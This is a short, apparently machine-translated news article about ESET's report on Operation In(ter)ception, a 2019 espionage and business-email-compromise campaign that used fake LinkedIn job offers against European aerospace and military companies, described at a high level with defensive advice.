Eset, from a LinkedIn message to phishing
The attacks, which Eset nicknamed Operation In (ter) ception, based on the related malware sample "Inception.dll," took place from September to December 2019.
Intrusions originated from a LinkedIn message. "The message contained a fairly credible job offer, apparently from well-known companies in important sectors. Of course, the LinkedIn profile was fake, and the files sent within the communication were malicious, "said Dominik Breitenbacher, who analyzed the malware and conducted the investigation.
The files were sent directly via LinkedIn messages or via email containing a OneDrive link. For the latter option, the attackers had created email accounts corresponding to the fake LinkedIn profiles.
Once the recipient opened the file, he displayed a seemingly harmless PDF document with information about the fake job offer . Simultaneously with the opening of the file, the malware was installed, without being detected, on the victim's computer. In this way, the attackers were able to establish a connection to the victims' device.
Later, the hackers carried out a series of passages that Eset studied and described in the white paper "Operation In (ter) ception : targeted attacks against European aerospace and military companies. "
Among the tools used by the attackers, there was a malware multistage custom often appears as a legitimate software, modified versions of open-source tools and techniques of the so-called “Living off the land” using improperly Windows utility pre-installed to perform various malicious operations.
"The attacks that we have studied have all shown signs of espionage, with several clues that suggest a possible link with the infamous group Lazarus. However, neither the analysis of the malware or the survey allowed us to obtain information about the files that the attackers were aiming, " said Breitenbacher. In addition to espionage, the researchers also documented that the attackers were attempting to use the compromised accounts to steal money.
Among the e-mail of the victims, for example, attackers have found a communication with a customer relating to an invoice not paid . Following the exchange of notices are inserted by urging the customer to pay, of course, by entering their bank details. Fortunately, in that case, the customer was suspicious and contacted the victim for further confirmations, frustrating so the attempts by the attackers to carry out a so-called “business email compromise attack”.
"This attempt to monetize the access to the network of the victims should serve as an incentive to establish strong defenses against intrusions and to provide training on computer security for employees. This will allow us to recognize social engineering techniques, especially those less known , such as those used in the operation In(ter)ception," he concluded Breitenbacher.
